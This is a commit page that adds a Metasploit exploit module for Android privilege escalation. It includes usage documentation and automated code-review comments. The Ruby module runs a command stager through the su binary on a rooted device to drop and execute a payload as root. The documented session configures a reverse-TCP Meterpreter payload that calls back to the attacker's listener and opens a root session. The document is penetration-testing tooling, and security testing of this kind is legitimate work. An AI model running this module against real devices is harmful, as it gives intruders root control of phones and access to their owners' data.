Commit
Land #10012, Add an Android module to run payloads with su on a rooted device
Showing 2 changed files with 142 additions and 0 deletions.
@@ -0,0 +1,57 @@ | ||
## Description | ||
|
||
This module uses the su binary present on rooted devices to run a payload as root. | ||
|
||
A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root. | ||
This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a | ||
temporary directory, make it executable, execute it in the background, and finally delete the executable. | ||
|
||
On most devices the su binary will pop-up a prompt on the device asking the user for permission. | ||
|
||
## Vulnerable Application | ||
|
||
This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data. | ||
Many devices can be rooted by flashing new firmware, however the existing data will be lost. | ||
|
||
## Verfication steps | ||
|
||
You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md) | ||
|
||
Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. | ||
An example session follows: | ||
|
||
``` | ||
msf5 exploit(multi/handler) > sessions | ||
Active sessions | ||
=============== | ||
Id Name Type Information Connection | ||
-- ---- ---- ----------- ---------- | ||
1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107) | ||
msf5 exploit(multi/handler) > use exploit/android/local/su_exec | ||
msf5 exploit(android/local/su_exec) > set SESSION 1 | ||
SESSION => 1 | ||
msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp | ||
payload => linux/aarch64/meterpreter/reverse_tcp | ||
msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176 | ||
LHOST => 192.168.0.176 | ||
msf5 exploit(android/local/su_exec) > set LPORT 4445 | ||
LPORT => 4445 | ||
msf5 exploit(android/local/su_exec) > run | ||
[!] SESSION may not be compatible with this module. | ||
[*] Started reverse TCP handler on 192.168.0.176:4445 | ||
[*] Transmitting intermediate midstager...(256 bytes) | ||
[*] Sending stage (818780 bytes) to 192.168.0.107 | ||
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800 | ||
[-] Exploit failed: Rex::TimeoutError Operation timed out. | ||
[*] Exploit completed, but no session was created. | ||
``` | ||
|
||
Please not that in most cases you will have to manually confirm the Superuser prompt | ||
on the device itself before the module completes. You can do `set WfsDelay 10` to | ||
give yourself more time. | ||
|
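Review bot: two typos in the new documentation file, the heading `## Verfication steps` should read `## Verification steps` and `Please not that in most cases` should read `Please note that in most cases`. The example session also ends with `[-] Exploit failed: Rex::TimeoutError Operation timed out.` followed by "Exploit completed, but no session was created" right after session 2 is reported as opened, which will confuse readers; a sentence explaining that the new session is still usable and that the timeout comes from WfsDelay expiring while the Superuser prompt is pending would help, and the "SESSION may not be compatible" warning deserves the same treatment. Finally, the file has no `## Options` section describing `SU_BINARY` and `WritableDir`, which the module hunk registers.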
@@ -0,0 +1,85 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Local | ||
Rank = ManualRanking | ||
|
||
include Msf::Exploit::CmdStager | ||
include Msf::Post::File | ||
include Msf::Post::Android::Priv | ||
|
||
def initialize(info={}) | ||
super( update_info( info, { | ||
'Name' => "Android 'su' Privilege Escalation", | ||
'Description' => %q{ | ||
This module uses the su binary present on rooted devices to run | ||
a payload as root. | ||
A rooted Android device will contain a su binary (often linked with | ||
an application) that allows the user to run commands as root. | ||
This module will use the su binary to execute a command stager | ||
as root. The command stager will write a payload binary to a | ||
temporary directory, make it executable, execute it in the background, | ||
and finally delete the executable. | ||
On most devices the su binary will pop-up a prompt on the device | ||
asking the user for permission. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'DisclosureDate' => 'Aug 31 2017', | ||
'SessionTypes' => [ 'meterpreter', 'shell' ], | ||
'Platform' => [ 'android', 'linux' ], | ||
'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ], | ||
'Targets' => [ | ||
['aarch64',{'Arch' => ARCH_AARCH64}], | ||
['armle', {'Arch' => ARCH_ARMLE}], | ||
['x86', {'Arch' => ARCH_X86}], | ||
['x64', {'Arch' => ARCH_X64}], | ||
['mipsle', {'Arch' => ARCH_MIPSLE}] | ||
], | ||
'DefaultOptions' => { | ||
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp', | ||
'WfsDelay' => 5, | ||
}, | ||
'DefaultTarget' => 0, | ||
} | ||
)) | ||
register_options([ | ||
OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']), | ||
OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']), | ||
]) | ||
end | ||
|
||
def base_dir | ||
datastore['WritableDir'].to_s | ||
end | ||
|
||
def su_bin | ||
datastore['SU_BINARY'].to_s | ||
end | ||
|
||
def exploit | ||
if is_root? | ||
fail_with Failure::BadConfig, 'Session already has root privileges' | ||
end | ||
|
||
linemax = 4088 - su_bin.size | ||
execute_cmdstager({ | ||
flavor: :echo, | ||
enc_format: :octal, | ||
prefix: '\\\\0', | ||
temp: base_dir, | ||
linemax: linemax, | ||
background: true, | ||
}) | ||
end | ||
|
||
def execute_command(cmd, opts) | ||
su_cmd = "#{su_bin} -c '#{cmd}'" | ||
cmd_exec(su_cmd) | ||
end | ||
|
||
end | ||
|
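Review bot: `execute_command` in the last hunk builds `su_cmd = "#{su_bin} -c '#{cmd}'"` by wrapping the stager output in single quotes without escaping, so a command containing a single quote would break the wrapper; either escape `cmd` or add a comment stating that the `:echo` / `:octal` stager output is known to contain no single quotes. The `opts` argument of `execute_command` is unused, and `linemax = 4088 - su_bin.size` is a magic number that needs a comment saying which line-length limit it derives from and that it leaves room for the ` -c ''` wrapper. Consider checking that `SU_BINARY` is actually present before `execute_cmdstager` runs, so a session on a non-rooted device fails with a clear message rather than the timeout shown in the documentation. Lastly, the `Arch` list omits `dalvik`, the arch of the session shown in the documentation, which is what triggers the `[!] SESSION may not be compatible with this module.` warning; a brief comment or doc note explaining that this is expected would avoid alarm.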